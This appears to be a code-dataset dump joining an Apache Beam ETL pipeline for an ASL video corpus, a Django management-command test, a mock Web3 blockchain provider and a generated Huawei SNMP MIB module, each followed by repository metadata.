            n_partitions
        )
    )
    per_partition_results = []
    for partition_idx, partition_pcoll in enumerate(download_partitions):
        p_label = f"p{partition_idx+1}"
        p_label_indented = f"\t{p_label}"
        per_partition_results.append(
            partition_pcoll
            | f"Beam PL: {p_label} gather download info for video segments" >> beam.ParDo(VideoSegmentInfoGatherer(d_pl_options))
            | f"Beam PL: {p_label} download video segments" >> beam.ParDo(VideoSegmentDownloader(d_pl_options, p_label_indented))
        )
    # Recombine the independent per-partition result pcolls into one.
    return (
        tuple(per_partition_results)
        | "Beam PL: merge download results" >> beam.Flatten()
    )
def pl__4__parallel_extract_target_video_frames(merged_download_results, d_pl_options, n_partitions=8):
    """
    Group downloaded segment videos by their target video, partition the groups, and
    extract segment frames per target video in parallel; returns the merged
    (video_fname, n_stitched_frames) extraction results pcoll.

    # ******************** EXTRACT SEGMENT-FRAMES IN PARALLEL: BEGIN ********************
    # NOTE! THIS IS A CRUCIAL PIECE SO PAY ATTENTION TO THE FOLLOWING!!
    # ********** --> IMPORTANT VIDEO-FRAME EXTRACTION PROCESSING INFORMATION<-- (BEGIN) **********
    # We partitioned vid_index_schemad_pcoll so that video-SEGMENT downloads can occur independently.
    # Downloading segments can occur independently since there is no correlation between each segment
    # AS FAR AS DOWNLOADING IS CONCERNED.
    #
    # However, AS FAR AS EXTRACTION IS CONCERNED, each segment is related by the target video composed
    # of each segment. The segment-videos themselves are ordered as they compose the final target
    # video corresponding of ordered segment videos. For example, if a target video is composed of
    # three segment videos, those segments occur in a certain order, as specified by the video index.
    # Expanding upon this example, suppose target video "some_story_given_by_john_doe_0.mov", was recorded
    # and saved in three corresponding video segments (to save space, I guess?)
    # "some_story_given_by_john_doe_0_1.mov", "some_story_given_by_john_doe_0_2.mov", and
    # "some_story_given_by_john_doe_0_3.mov". Note that the trailing "0" in the TARGET VIDEO filename
    # indicates the camera perspective... all stories are potentially filmed from multiple synchronized
    # camera perspectives/angles - there were obvioiusly multiple synchronized video recorders used in
    # in that case. However, for this example, we are focusing on the target video for camera perspective 0.
    # Anyway, as said, there are three segments which compose the target video. THESE SEGMENT VIDEOS
    # ARE ORDERED (in time). THEREFORE, THE FRAMES COMPOSING EACH SEGMENT VIDEO ARE CONSEQUENTLY ORDERED
    # (in time). THE BOTTOM LINE IS THAT WE NOW NEED TO GROUP SEGMENT VIDEOS, KEYED BY CORRESPONDING
    # TARGET VIDEO. FURTHERMORE, THE COLLECTION OF SEGMENT VIDEOS FOR EACH TARGET VIDEO MUST BE ORDERED.
    # THAT IS, WE MUST EXTRACT SEGMENT FRAMES AND SAVE THEM TO THE FILE SYSTEM WITH A FILE NAMING SCHEME
    # THAT REFLECTS FRAME ORDER OF THE UNION OF ALL SEGMENT FRAMES. IF WE EXTRACT THE FRAMES OF EACH
    # ORDERED SEGMENT, THEN A SIMPLE NUMERIC INDEX AS SEGMENT-FRAME FILENAME WILL DO THE TRICK.
    # ********** --> IMPORTANT VIDEO-FRAME EXTRACTION PROCESSING INFORMATION<-- (END) **********
    """
    # GROUP segment videos by target video
    # note that this depends on the DAG - i.e. will not occur until partition_download_results are ready which, of course, does not occur until all videos have been downloaded
    target_vid_seg_frame_extraction_partitions = (
        merged_download_results
        | f"Beam PL: group extraction info for video segments by target video" >> beam.GroupBy(lambda d: d['target_video_fname'])
        | f"Beam PL: partition target video segment info for extraction parallelization" >> beam.Partition(
            lambda vid_index_row, num_partitions: random.randint(0,num_partitions-1),
            n_partitions
        )
    )
    partition_extraction_results = [None for i in range(n_partitions)]
    for i, p in enumerate(target_vid_seg_frame_extraction_partitions):
        p_label = f"p{i+1}"
        p_label_indented = f"\t{p_label}"
        p_extraction_results = (
            p
            | f"Beam PL: {p_label} extract frames of each segment per target video" >> beam.ParDo(SegmentFrameExtractor(d_pl_options, f"{p_label_indented}", debug=False))
        )
        partition_extraction_results[i] = p_extraction_results
        # side branch: per-partition count of target videos processed (printed, not returned)
        (
            p_extraction_results
            | f"Beam PL: {p_label} count target videos processed" >> beam.combiners.Count.Globally()
            | f"Beam PL: {p_label} print target videos processed count" >> beam.ParDo(beam__common.PipelinePcollPrinter(label=p_label_indented, msg="target videos processed"))
        )
    merged_extraction_results = (
        (p_extraction_results for p_extraction_results in partition_extraction_results)
        | f"Beam PL: merge extraction results" >> beam.Flatten()
    )
    # side branch: total frame count across all target videos (printed, not returned)
    _ = (
        merged_extraction_results
        | "Beam PL: apply schema to merged extraction results pcoll" >> beam.Map(lambda x: beam.Row(
            video_fname=str(x[0]),
            n_stitched_frames=int(x[1])
        ))
        # | "Beam PL: count total frames extracted" >> beam.transforms.sql.SqlTransform(f"SELECT SUM(n_stitched_frames) AS total_frames_extracted FROM PCOLLECTION") # this is VERY, VERY SLOW
        | "Beam PL: select n_stitched_frames" >> beam.Map(lambda extraction_results_row: extraction_results_row.n_stitched_frames)
        | "Beam PL: count total frames extracted" >> beam.CombineGlobally(sum)
        | f"Beam PL: print total frames extracted" >> beam.ParDo(beam__common.PipelinePcollPrinter(msg="TOTAL FRAMES EXTRACTED"))
    )
    return merged_extraction_results
    # ******************** EXTRACT SEGMENT-FRAMES IN PARALLEL: END ********************
def run(
    max_target_videos,
    work_dir,
    beam_runner='DirectRunner',
    beam_gcp_project=None,
    beam_gcp_region=None,
    beam_gcp_dataflow_job_name=None,
    beam_gcs_staging_bucket=None,
    beam_gcs_temp_location=None,
    beam_gcp_dataflow_setup_file=None
):
    """Execute the full FIDS corpus ETL as a sequence of Beam pipeline jobs.

    Each stage runs as its own pipeline, sequentially, because later stages
    read files written by earlier ones; running everything in one DAG would
    race the filesystem (see the corpus-index note below).

    Args:
        max_target_videos: cap on the number of target videos to process
            (-1 means "all").
        work_dir: root working directory (local path or GCS bucket URL).
        beam_runner: Beam runner name; any value other than 'DirectRunner'
            is treated as a GCP Dataflow run.
        beam_gcp_project, beam_gcp_region, beam_gcp_dataflow_job_name,
        beam_gcs_staging_bucket, beam_gcs_temp_location,
        beam_gcp_dataflow_setup_file: GCP/Dataflow settings; only consulted
            when beam_runner != 'DirectRunner' (except the job name, which
            prefixes every per-stage job name).

    Returns:
        None. Prints progress banners and aborts early (with a message) if
        the Dataflow setup file is not './setup.py'.
    """
    if beam_runner != 'DirectRunner':
        # Dataflow must ship this package to workers via ./setup.py.
        if beam_gcp_dataflow_setup_file != './setup.py':
            print(f"*** FATAL ERROR!!! *** beam_gcp_setup_file=={beam_gcp_dataflow_setup_file} but it should be ./setup.py")
            return
        logging.getLogger().setLevel(logging.INFO) # enable logging only for DataflowRunner
        options = {
            'runner': beam_runner,
            'streaming': False, # set to True if data source is unbounded (e.g. GCP PubSub),
            'max_num_workers': 8,
            'autoscaling_algorithm': 'THROUGHPUT_BASED',
            'num_workers': 4,
            'disk_size_gb': 250,
            'save_main_session': True,
            'enable_streaming_engine': False,
            # GCP options
            'project': beam_gcp_project,
            'region': beam_gcp_region,
            'worker_region': beam_gcp_region,
            'service_account_email': 'fids-capstone-beam-pl-gcs@sc-fids-capstone.iam.gserviceaccount.com',
            'staging_location': beam_gcs_staging_bucket,
            'temp_location': beam_gcs_temp_location,
            'setup_file': beam_gcp_dataflow_setup_file,
            'job_name': beam_gcp_dataflow_job_name,
        }
    else:
        options = {
            'runner': 'DirectRunner',
            'environment_type': 'DOCKER',
            'direct_num_workers': 0, # 0 is use all available cores
            'direct_running_mode': 'multi_processing', # ['in_memory', 'multi_threading', 'multi_processing']
            'streaming': False # set to True if data source is unbounded (e.g. GCP PubSub),
        }
    # BUG FIX: the original passed max_target_videos=-1 here, silently ignoring
    # the caller-supplied cap; propagate the parameter instead.
    # NOTE(review): fidscs_globals.GCP_PROJECT is kept (as in the original)
    # rather than the beam_gcp_project argument — confirm before changing.
    options.update(beam__common.make_fids_options_dict(work_dir, max_target_videos=max_target_videos, beam_gcp_project=fidscs_globals.GCP_PROJECT))

    n_partitions = 8 # hardcoded for now but we need to retrieve this from beam to be the number of workers

    def _start_job(job_suffix):
        """Name the next pipeline job, print its banner, and build its PipelineOptions."""
        job_name = f"{beam_gcp_dataflow_job_name}--{job_suffix}"
        print(f"\n\n****************************** Starting pipeline job: {job_name} ******************************")
        options.update({
            'job_name': job_name
        })
        pipeline_options = PipelineOptions(flags=[], **options) # easier to pass in options from command-line this way
        print(f"PipelineOptions:\n{pipeline_options.get_all_options()}\n")
        return job_name, pipeline_options

    def _end_job(job_name):
        """Print the closing banner for a completed pipeline job."""
        print(f"****************************** Finished pipeline job: {job_name} ******************************")

    # 1) bootstrap the target-video index
    #    (the 'boostrap' typo is kept byte-for-byte for job-name stability)
    job_name, pipeline_options = _start_job('boostrap-vid-index')
    with beam.Pipeline(options=pipeline_options) as pl:
        full_target_vid_index_schemad_pcoll = pl__1__bootstrap_target_video_index(pl)
        pl__2__write_target_vid_index_csv(full_target_vid_index_schemad_pcoll, pl._options._all_options)
    _end_job(job_name)

    # 2) download target videos and extract their frames, partitioned for parallelism
    job_name, pipeline_options = _start_job('download-videos-extract-frames')
    with beam.Pipeline(options=pipeline_options) as pl:
        full_target_vid_index_schemad_pcoll = beam__common.pl__1__read_target_vid_index_csv(pl)
        filtered_target_vid_index_schemad_pcoll = pl__2__filter_target_vid_index(full_target_vid_index_schemad_pcoll, pl._options._all_options)
        merged_download_results = pl__3__parallel_download_videos(filtered_target_vid_index_schemad_pcoll, pl._options._all_options, n_partitions)
        merged_extraction_results = pl__4__parallel_extract_target_video_frames(merged_download_results, pl._options._all_options, n_partitions)
    _end_job(job_name)

    # 3) bootstrap the corpus (document) index
    job_name, pipeline_options = _start_job('bootstrap-corpus-index')
    with beam.Pipeline(options=pipeline_options) as pl:
        pl__1__bootstrap_corpus_index(pl)
    _end_job(job_name)

    # 4) writing the corpus index needs to be in a separate pipeline, which will
    #    execute sequentially after the download completes; note that if we don't
    #    do it this way, it is HIGHLY probable that the file structure will not
    #    be ready for reading yet
    job_name, pipeline_options = _start_job('transform-corpus-documents-to-index')
    with beam.Pipeline(options=pipeline_options) as pl:
        corpus_index_schemad_pcoll = pl__1__corpus_document_file_structure_to_corpus_index(pl)
        pl__2__write_corpus_index_csv(
            corpus_index_schemad_pcoll,
            beam__common.GlobalVarValueAssigner(fn_assign_to_global=assign_to_global__raw_xml_b64_max_len),
            pl._options._all_options
        )
    _end_job(job_name)

    # 5) parse SignStream XML -> ASL consultant index
    job_name, pipeline_options = _start_job('transform-ss-xml-to-asl-consultant-index')
    with beam.Pipeline(options=pipeline_options) as pl:
        full_target_vid_index_schemad_pcoll = beam__common.pl__1__read_target_vid_index_csv(pl)
        corpus_index_schemad_pcoll = beam__common.pl__1__read_corpus_index_csv(pl)
        corpus_index_decoded_XML_pcoll = pl__2__decode_XML(corpus_index_schemad_pcoll, pl._options._all_options)
        ss_parsed_xmldb_pcoll = pl__3__parse_signstream_database(corpus_index_decoded_XML_pcoll, pl._options._all_options)
        asl_consultant_index_schemad_pcoll = pl__4__create_asl_consultant_index_schemad_pcoll(ss_parsed_xmldb_pcoll, pl._options._all_options)
        pl__5__write_asl_consultant_index_csv(asl_consultant_index_schemad_pcoll, pl._options._all_options)
    _end_job(job_name)

    # 6) SignStream XML -> (document, ASL consultant) index
    job_name, pipeline_options = _start_job('transform-ss-xml-to-document-asl-consultant-index')
    with beam.Pipeline(options=pipeline_options) as pl:
        full_target_vid_index_schemad_pcoll = beam__common.pl__1__read_target_vid_index_csv(pl)
        corpus_index_schemad_pcoll = beam__common.pl__1__read_corpus_index_csv(pl)
        corpus_index_decoded_XML_pcoll = pl__2__decode_XML(corpus_index_schemad_pcoll, pl._options._all_options)
        ss_parsed_xmldb_pcoll = pl__3__parse_signstream_database(corpus_index_decoded_XML_pcoll, pl._options._all_options)
        asl_consultant_index_schemad_pcoll = beam__common.pl__1__read_asl_consultant_index_csv(pl)
        document_asl_consultant_index_schemad_pcoll = pl__5__create_document_asl_consultant_index_schemad_pcoll(
            ss_parsed_xmldb_pcoll,
            corpus_index_schemad_pcoll,
            asl_consultant_index_schemad_pcoll,
            pl._options._all_options
        )
        pl__6__write_document_asl_consultant_index_csv(document_asl_consultant_index_schemad_pcoll, pl._options._all_options)
    _end_job(job_name)

    # 7) SignStream XML -> (document, ASL consultant, utterance) index
    job_name, pipeline_options = _start_job('transform-ss-xml-to-document-asl-consultant-utterance-index')
    with beam.Pipeline(options=pipeline_options) as pl:
        full_target_vid_index_schemad_pcoll = beam__common.pl__1__read_target_vid_index_csv(pl)
        corpus_index_schemad_pcoll = beam__common.pl__1__read_corpus_index_csv(pl)
        corpus_index_decoded_XML_pcoll = pl__2__decode_XML(corpus_index_schemad_pcoll, pl._options._all_options)
        ss_parsed_xmldb_pcoll = pl__3__parse_signstream_database(corpus_index_decoded_XML_pcoll, pl._options._all_options)
        document_asl_consultant_index_schemad_pcoll = beam__common.pl__1__read_document_asl_consultant_index_csv(pl)
        document_asl_consultant_utterance_index_schemad_pcoll = pl__6__create_document_asl_consultant_utterance_index_schemad_pcoll(
            ss_parsed_xmldb_pcoll,
            document_asl_consultant_index_schemad_pcoll,
            pl._options._all_options
        )
        pl__7__write_document_asl_consultant_utterance_index_csv(document_asl_consultant_utterance_index_schemad_pcoll, pl._options._all_options)
    _end_job(job_name)

    # 8) SignStream XML -> (document, ASL consultant, target video) indexes
    job_name, pipeline_options = _start_job('transform-ss-xml-to-document-asl-consultant-target-video-index')
    with beam.Pipeline(options=pipeline_options) as pl:
        full_target_vid_index_schemad_pcoll = beam__common.pl__1__read_target_vid_index_csv(pl)
        corpus_index_schemad_pcoll = beam__common.pl__1__read_corpus_index_csv(pl)
        corpus_index_decoded_XML_pcoll = pl__2__decode_XML(corpus_index_schemad_pcoll, pl._options._all_options)
        ss_parsed_xmldb_pcoll = pl__3__parse_signstream_database(corpus_index_decoded_XML_pcoll, pl._options._all_options)
        document_asl_consultant_index_schemad_pcoll = beam__common.pl__1__read_document_asl_consultant_index_csv(pl)
        document_asl_consultant_target_video_index_schemad_pcoll, document_target_video_segment_index_schemad_pcoll = pl__6__create_document_asl_consultant_target_video_index_pcolls(
            ss_parsed_xmldb_pcoll,
            document_asl_consultant_index_schemad_pcoll,
            full_target_vid_index_schemad_pcoll,
            pl._options._all_options
        )
        pl__7__write_document_asl_consultant_target_video_index_csv(document_asl_consultant_target_video_index_schemad_pcoll, pl._options._all_options)
        pl__7__write_document_asl_consultant_utterance_video_index_csv(document_asl_consultant_target_video_index_schemad_pcoll, pl._options._all_options)
        pl__7__write_document_target_video_segment_index_csv(document_target_video_segment_index_schemad_pcoll, pl._options._all_options)
    _end_job(job_name)

    # 9) SignStream XML -> vocabulary + (document, consultant, utterance, token) indexes
    job_name, pipeline_options = _start_job('transform-ss-xml-to-vocabulary-index')
    with beam.Pipeline(options=pipeline_options) as pl:
        full_target_vid_index_schemad_pcoll = beam__common.pl__1__read_target_vid_index_csv(pl)
        corpus_index_schemad_pcoll = beam__common.pl__1__read_corpus_index_csv(pl)
        corpus_index_decoded_XML_pcoll = pl__2__decode_XML(corpus_index_schemad_pcoll, pl._options._all_options)
        ss_parsed_xmldb_pcoll = pl__3__parse_signstream_database(corpus_index_decoded_XML_pcoll, pl._options._all_options)
        document_asl_consultant_index_schemad_pcoll = beam__common.pl__1__read_document_asl_consultant_index_csv(pl)
        vocabulary_index_pcoll, document_asl_consultant_utterance_token_index_schemad_pcoll = pl__6__create_document_asl_consultant_utterance_token_index_schemad_pcoll(
            ss_parsed_xmldb_pcoll,
            document_asl_consultant_index_schemad_pcoll,
            pl._options._all_options
        )
        pl__7__write_vocabulary_index_csv(vocabulary_index_pcoll, pl._options._all_options)
        pl__7__write_document_asl_consultant_utterance_token_index_csv(document_asl_consultant_utterance_token_index_schemad_pcoll, pl._options._all_options)
    _end_job(job_name)

    # 10) (document, consultant, target video) -> per-frame index
    job_name, pipeline_options = _start_job('transform-ss-xml-to-document-asl-consultant-target-video-frame-index')
    with beam.Pipeline(options=pipeline_options) as pl:
        document_asl_consultant_target_video_index_schemad_pcoll = beam__common.pl__1__read_document_asl_consultant_target_video_index_csv(pl)
        document_asl_consultant_target_video_frame_index_schemad_pcoll = pl__7__create_document_asl_consultant_target_video_frame_index_schemad_pcoll(
            document_asl_consultant_target_video_index_schemad_pcoll,
            pl._options._all_options
        )
        pl__8__write_document_asl_consultant_target_video_frame_index_schemad_pcoll(document_asl_consultant_target_video_frame_index_schemad_pcoll, pl._options._all_options)
    _end_job(job_name)

    # 11) join token, utterance and frame indexes -> (utterance, token, frame) index
    job_name, pipeline_options = _start_job('transform-ss-xml-to-document-asl-consultant-target-video-utterance-token-frame-index')
    with beam.Pipeline(options=pipeline_options) as pl:
        document_asl_consultant_utterance_token_index_schemad_pcoll = beam__common.pl__1__read_document_asl_consultant_utterance_token_index_csv(pl)
        document_asl_consultant_target_video_utterance_index_schemad_pcoll = beam__common.pl__1__read_document_asl_consultant_target_video_utterance_index_csv(pl)
        document_asl_consultant_target_video_frame_index_schemad_pcoll = beam__common.pl__1__read_document_asl_consultant_target_video_frame_index_csv(pl)
        document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll = pl__8__create_document_asl_consultant_utterance_token_frame_index_schemad_pcoll(
            document_asl_consultant_utterance_token_index_schemad_pcoll,
            document_asl_consultant_target_video_utterance_index_schemad_pcoll,
            document_asl_consultant_target_video_frame_index_schemad_pcoll,
            pl._options._all_options
        )
        pl__9__write_document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll(
            document_asl_consultant_target_video_utterance_token_frame_index_schemad_pcoll,
            pl._options._all_options
        )
    _end_job(job_name)

    # 12) clean up intermediate/tmp artifacts
    job_name, pipeline_options = _start_job('remove-intermediate-files')
    with beam.Pipeline(options=pipeline_options) as pl:
        tmp_dir_path_pcoll = (
            pl
            | f"Beam PL: create pcoll for {pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR]} cleanup" >> beam.Create([pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR]])
        )
        beam__common.pl__X__rmdir(
            tmp_dir_path_pcoll,
            pl._options._all_options[fidscs_globals.OPT_NAME_TMP_DIR],
            pl._options._all_options
        )
        video_dir = pl._options._all_options[fidscs_globals.OPT_NAME_VIDEO_DIR]
        fs = FileSystems.get_filesystem(video_dir)
        # isinstance (not type ==) so GCSFileSystem subclasses are handled too
        if isinstance(fs, GCSFileSystem):
            # GCS runs stage videos under a truly-local /tmp mirror; remove that as well
            truly_local_vid_dir_suffix = '/'.join(video_dir.split('/')[1:])
            truly_local_vid_dir_root = '/tmp/'+truly_local_vid_dir_suffix.split('/')[1]
            truly_local_vid_dir_path_pcoll = (
                pl
                | f"Beam PL: create pcoll for {truly_local_vid_dir_root} cleanup" >> beam.Create([truly_local_vid_dir_root])
            )
            beam__common.pl__X__rmdir(
                truly_local_vid_dir_path_pcoll,
                truly_local_vid_dir_root,
                pl._options._all_options
            )
    _end_job(job_name)

    print(f"Beam PL: ALL DONE!")
| 57.282553
| 390
| 0.747455
|
a759d67ec3c2072d95a2e1577e0fcb2fc6d321f6
| 907
|
py
|
Python
|
django_g11n/tests/test_002_command_update_currencies.py
|
martinphellwig/django-g11n
|
94eb9da7d7027061873cd44356fdf3378cdb3820
|
[
"BSD-2-Clause"
] | null | null | null |
django_g11n/tests/test_002_command_update_currencies.py
|
martinphellwig/django-g11n
|
94eb9da7d7027061873cd44356fdf3378cdb3820
|
[
"BSD-2-Clause"
] | null | null | null |
django_g11n/tests/test_002_command_update_currencies.py
|
martinphellwig/django-g11n
|
94eb9da7d7027061873cd44356fdf3378cdb3820
|
[
"BSD-2-Clause"
] | null | null | null |
"main testing module"
from django.test import TestCase
# Create your tests here.
class UpdateCurrenciesTestCase(TestCase):
    """Exercise the ``update_currencies`` management command."""
    # pylint: disable=missing-docstring, no-member, invalid-name
    @classmethod
    def setUpClass(cls):
        # Zero-argument super() is equivalent here (Python 3).
        return super().setUpClass()
    def setUp(self):
        result = super().setUp()
        from . import common
        common.setup_currencies()
        return result
    def test_001_insert(self):
        from django.core.management import call_command
        call_command('update_currencies')
        # Calling twice, as the second time it should exclude it.
        call_command('update_currencies')
if __name__ == '__main__': # pragma: no cover
    # pylint: disable=wrong-import-position
    import django
    django.setup()
    # BUG FIX: `import django` does not import the `django.core.management`
    # submodule, so `django.core.management.call_command(...)` can raise
    # AttributeError; import call_command explicitly instead.
    from django.core.management import call_command
    call_command('test')
| 27.484848
| 67
| 0.689085
|
4359ee0e1268e300e9e555365eeff6709871acbc
| 3,799
|
py
|
Python
|
tests/mocks/web3provider.py
|
tmierzwa/Ethtx
|
29d85873d9f13fd4ec6142bd11efb9f5642985df
|
[
"Apache-2.0"
] | 1
|
2021-08-02T00:40:38.000Z
|
2021-08-02T00:40:38.000Z
|
tests/mocks/web3provider.py
|
tmierzwa/ethtx
|
29d85873d9f13fd4ec6142bd11efb9f5642985df
|
[
"Apache-2.0"
] | null | null | null |
tests/mocks/web3provider.py
|
tmierzwa/ethtx
|
29d85873d9f13fd4ec6142bd11efb9f5642985df
|
[
"Apache-2.0"
] | null | null | null |
from typing import Dict
from hexbytes import HexBytes
from ethtx.models.w3_model import W3Transaction, W3Receipt, W3Block, W3Log
from ethtx.utils.attr_dict import AttrDict
class MockWeb3Provider:
blocks = {
1: {
"difficulty": 123, # int
"extraData": "test", # HexBytes
"gasLimit": 123, # int
"gasUsed": 123, # int
"hash": HexBytes(
b"\x88\xe9mE7\xbe\xa4\xd9\xc0]\x12T\x99\x07\xb3%a\xd3\xbf1\xf4Z\xaesL\xdc\x11\x9f\x13@l\xb6"
), # str
"logsBloom": "test", # HexBytes
"miner": "test", # str
"nonce": "test", # HexBytes
"number": 123, # int
"parentHash": HexBytes(
b"\x88\xe9mE7\xbe\xa4\xd9\xc0]\x12T\x99\x07\xb3%a\xd3\xbf1\xf4Z\xaesL\xdc\x11\x9f\x13@l\xb6"
), # str
"receiptsRoot": "test", # HexBytes
"sha3Uncles": "test", # HexBytes
"size": 123, # int
"stateRoot": "test", # HexBytes
"timestamp": 123, # int,
"totalDifficulty": 123, # int
"transactions": [], # List
"transactionsRoot": "test", # HexBytes
"uncles": [], # List
}
}
txs = {
"0xd7701a0fc05593aee3a16f20cab605db7183f752ae942cc75fd0975feaf1072e": {
"blockHash": HexBytes(
b"\x88\xe9mE7\xbe\xa4\xd9\xc0]\x12T\x99\x07\xb3%a\xd3\xbf1\xf4Z\xaesL\xdc\x11\x9f\x13@l\xb6"
), # str
"blockNumber": 1, # int
"from_address": "fromasd", # str
"gas": 420, # int
"gasPrice": 1, # int
"hash": HexBytes(
b"\x88\xe9mE7\xbe\xa4\xd9\xc0]\x12T\x99\x07\xb3%a\xd3\xbf1\xf4Z\xaesL\xdc\x11\x9f\x13@l\xb6"
), # HexBytes,
"input": "jeszcze jak", # str
"nonce": 123, # int
"r": "ds", # HexBytes
"s": "sdf", # HexBytes
"to": "sdf", # str
"transactionIndex": 1, # int
"v": 1, # int
"value": 1, # int
}
}
def add_mocked_block_details(self, block_number, block_details: Dict):
self.blocks[block_number] = block_details
def get_transaction(self, tx_hash, chain_id="mainnet"):
return W3Transaction(chain_id=chain_id, **self.txs[tx_hash])
def get_receipt(self, tx_hash, chain_id):
log_values = AttrDict(
{
"tx_hash": tx_hash,
"chain_id": chain_id,
"address": "test", # str
"blockHash": "test", # HexBytes
"blockNumber": 123, # int
"data": "test", # str
"logIndex": 132, # int
"removed": False, # bool,
"topics": [HexBytes("d")], # List[HexBytes]
"transactionHash": "test", # HexBytes
"transactionIndex": 123, # int
}
)
log = W3Log(**log_values)
values = {
"blockHash": "test", # HexBytes
"blockNumber": 123, # int
"contractAddress": 123, # str
"cumulativeGasUsed": 132, # int,
"from_address": "from", # str
"gasUsed": 123, # int
"logs": [log], # List
"logsBloom": "test", # HexBytes
"root": "test", # str
"status": 123, # int,
"to_address": "test", # str
"transactionHash": "test", # HexBytes
"transactionIndex": 123, # int
}
return W3Receipt(tx_hash, chain_id, **values)
def get_block(self, block_number: int, chain_id: str = None) -> W3Block:
    """Return a W3Block built from the mocked details for *block_number*.

    Raises KeyError if the block was never added via
    add_mocked_block_details.
    """
    block_fields = self.blocks[block_number]
    return W3Block(chain_id=chain_id, **block_fields)
| 36.528846
| 108
| 0.493024
|
ab86ec2c367b74c273976c5a323677d58bd90fd7
| 10,010
|
py
|
Python
|
pysnmp/HUAWEI-TDM-PSN-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 11
|
2021-02-02T16:27:16.000Z
|
2021-08-31T06:22:49.000Z
|
pysnmp/HUAWEI-TDM-PSN-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 75
|
2021-02-24T17:30:31.000Z
|
2021-12-08T00:01:18.000Z
|
pysnmp/HUAWEI-TDM-PSN-MIB.py
|
agustinhenze/mibs.snmplabs.com
|
1fc5c07860542b89212f4c8ab807057d9a9206c7
|
[
"Apache-2.0"
] | 10
|
2019-04-30T05:51:36.000Z
|
2022-02-16T03:33:41.000Z
|
#
# PySNMP MIB module HUAWEI-TDM-PSN-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/HUAWEI-TDM-PSN-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 19:37:21 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
# Pull ASN.1/SMI building blocks from MIB modules already loaded into this
# builder. NOTE: `mibBuilder` is injected by the pysnmp MIB loader when it
# execs this pysmi-generated file; it is not imported here.
OctetString, ObjectIdentifier, Integer = mibBuilder.importSymbols("ASN1", "OctetString", "ObjectIdentifier", "Integer")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
ConstraintsIntersection, SingleValueConstraint, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "ConstraintsIntersection", "SingleValueConstraint", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion")
# Huawei enterprise root and the vendor PW encapsulation-type TC.
hwDatacomm, = mibBuilder.importSymbols("HUAWEI-MIB", "hwDatacomm")
HWL2VpnVcEncapsType, = mibBuilder.importSymbols("HUAWEI-VPLS-EXT-MIB", "HWL2VpnVcEncapsType")
InterfaceIndex, = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex")
ObjectGroup, ModuleCompliance, NotificationGroup = mibBuilder.importSymbols("SNMPv2-CONF", "ObjectGroup", "ModuleCompliance", "NotificationGroup")
ModuleIdentity, Counter32, NotificationType, Bits, MibIdentifier, IpAddress, Unsigned32, TimeTicks, MibScalar, MibTable, MibTableRow, MibTableColumn, iso, Counter64, Integer32, ObjectIdentity, Gauge32 = mibBuilder.importSymbols("SNMPv2-SMI", "ModuleIdentity", "Counter32", "NotificationType", "Bits", "MibIdentifier", "IpAddress", "Unsigned32", "TimeTicks", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "iso", "Counter64", "Integer32", "ObjectIdentity", "Gauge32")
DisplayString, TextualConvention = mibBuilder.importSymbols("SNMPv2-TC", "DisplayString", "TextualConvention")
# Module identity: OID 1.3.6.1.4.1.2011.5.25.152 under the Huawei enterprise
# arc. The `loadTexts` guards skip descriptive-text setup when the builder
# was configured not to keep MIB texts.
hwTdmPsnMIB = ModuleIdentity((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152))
if mibBuilder.loadTexts: hwTdmPsnMIB.setLastUpdated('200706270900Z')
if mibBuilder.loadTexts: hwTdmPsnMIB.setOrganization('Huawei Technologies Co., Ltd.')
# Root node for all managed objects of this MIB (branch .1).
hwTdmPsnMIBObjects = MibIdentifier((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1))
# --- hwTdmPsnPerfCurrentTable ------------------------------------------------
# Current performance statistics per TDM pseudowire, indexed by PW id plus
# PW encapsulation type. All statistic columns are read-only gauges.
hwTdmPsnPerfCurrentTable = MibTable((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1), )
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentTable.setStatus('current')
hwTdmPsnPerfCurrentEntry = MibTableRow((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1), ).setIndexNames((0, "HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentPwIdIndex"), (0, "HUAWEI-TDM-PSN-MIB", "hwTdmPsnPerfCurrentPwTypeIndex"))
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentEntry.setStatus('current')
# Index columns (no max-access set: index-only objects).
hwTdmPsnPerfCurrentPwIdIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 1), Unsigned32())
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentPwIdIndex.setStatus('current')
hwTdmPsnPerfCurrentPwTypeIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 2), HWL2VpnVcEncapsType())
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentPwTypeIndex.setStatus('current')
# Data columns 3..11: packet-loss/reorder/jitter-buffer counters and
# error-second style gauges.
hwTdmPsnPerfCurrentMissingPkts = MibTableColumn((1, 3, 6, 1, 4, 1, 2011, 5, 25, 152, 1, 1, 1, 3), Gauge32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: hwTdmPsnPerfCurrentMissingPkts.setStatus('current')
